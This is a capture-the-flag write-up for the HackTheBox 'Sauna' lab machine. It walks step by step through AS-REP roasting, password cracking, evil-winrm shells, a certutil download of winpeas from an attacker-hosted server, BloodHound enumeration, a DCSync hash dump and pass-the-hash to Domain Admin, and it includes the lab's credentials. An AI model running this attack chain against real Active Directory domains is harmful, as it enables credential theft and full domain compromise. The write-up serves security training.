HackTheBox - Sauna Writeup

# HackTheBox - Sauna Writeup ###### tags: `writeup` `HackTheBox` `Sauna` `Easy` `OSCP` `Pass-The-Hash` `Evil-WinRM` `Kerbrute` `Impacket` ## :computer: Port Scanning ```bash # Nmap 7.92 scan initiated Thu Aug 25 18:16:41 2022 as: nmap -sV -T4 -sT -sC -v -oN nmap 10.10.10.175 Nmap scan report for 10.10.10.175 Host is up (0.066s latency). Not shown: 990 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 10.0 |_http-server-header: Microsoft-IIS/10.0 | http-methods: | Supported Methods: OPTIONS TRACE GET HEAD POST |_ Potentially risky methods: TRACE |_http-title: Egotistical Bank :: Home 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-08-26 17:13:08Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: 18h56m13s | smb2-security-mode: | 3.1.1: |_ Message signing enabled and required | smb2-time: | date: 2022-08-26T17:13:17 |_ start_date: N/A Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Thu Aug 25 18:17:41 2022 -- 1 IP address (1 host up) scanned in 59.48 seconds ``` - [ ] Port 53 : DNS Server - [ ] Port 80 : HTTP Server - [ ] Port 88 : Kerberos - Sec - [ ] Port 135 : MSRPC - [ ] Port 139 : Netbios-ssn - [ ] Port 389 : LDAP - [ ] Port 445 : Microsoft-ds - [ ] Port 464 : kpasswd5 - [ ] Port 593 : ncacn_http - [ ] Port 636 : Tcpwrapped ## :eye: Enumeration Knowing we have kerberos we are going to enumerate users using kerbrute: ```bash /opt/kerbrute/kerbrute_linux_amd64 userenum -d EGOTISTICAL-BANK.LOCAL /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt ``` ![](https://i.imgur.com/wxhYhZX.png) ## :bomb: Explotation After enumerating users it's time to try ASREP-Roasting for obtaining krbasrep5 hashes, in this case we can ASREP-Roast **fsmith** account with the following command. ```bash impacket-GetNPUsers EGOTISTICAL-BANK.LOCAL/fsmith -no-pass ``` We obtain the hash and we have to crack it, i use john. ![](https://i.imgur.com/BPtvbo9.png) ```bash john kerberos --wordlist=/usr/share/wordlists/rockyou.txt ``` We obtain the following password: ![](https://i.imgur.com/dHoWRb3.png) ##### Shell with evil-winrm After knowing the user & the password we can obtain shell with evil-winrm with the following command: ```bash evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23 ``` Now it's time to start the privilege escalation. --- ### ⏫Root Privesc First we are gonna upload a copy of **winpeas** to enumerate the system. We have to start the HTTP server: ```bash! python3 -m http.server 80 ``` I'd like to use certutil to download into the target machine: ```Powershell! certutil -urlcache -f http://10.10.10.10/winPEASx64.exe winpeas.exe ``` ```Powershell c:\Windows\System32\cmd.exe /c winpeas.exe ``` After reading the winpeas report it found some autologon credentials: ![](https://i.imgur.com/La7lOTw.png) With these credentials we can receive a shell as svc_loanmanager with evil-winrm again, but now we are gonna use python-bloodhound ingestor to enumerate the AD and find the way to obtain Administrator Credentials, use the following command to obtain the json files that we import in bloodhound app. Here you have a link that show how to use [bloodhound](https://hackmd.io/@Mecanico/BJo-wm9x5). ```bash! bloodhound-python -u svc_loanmgr -p Moneymakestheworldgoround! -ns 10.10.10.175 -d EGOTISTICAL-BANK.LOCAL -c All ``` Importing the json files to bloodhound and doing a query to find Principals With DCSync Rights We see that svc_loanmgr has them, so we can use impacket-secretdump to perform the DCsync attack and dump the NTLM hashes that we can use to Pass-The-Hash. ```bash! impacket-secretdump EGOTISTICAL-BANK.LOCAL/svc_loanmgr@10.10.10.175 ``` After that we have to enter the password and we receive a los of hashes, and how we obtain NTLMv1 hashes we can use the second part of the hash , the NT to pass the hash and obtain shell as Administrator. ![](https://i.imgur.com/PK6AlUd.png) The hash is composed by the Username of the account, the Account ID, the LM hash and the NT hash, everything separated by a colon. Using Evil-winrm we can **Pass-The-Hash** and obtain the shell with the following command: ```bash evil-winrm -i 10.10.10.175 -u Administrator -H NTHash ``` ![](https://i.imgur.com/kZWeKrf.png) And after that we are Domain Admins and we have Administrator rights so we can do everything we want! --- ### You can find me on: :bird:[**Twitter**](https://twitter.com/Aka_Mecanico) :desktop_computer: [**Github**](https://github.com/Mec4nico) :ballot_box_with_check: [**TryHackMe**](https://tryhackme.com/p/mech4nico) :green_book:[**HackTheBox**](https://www.hackthebox.eu/home/users/profile/336092)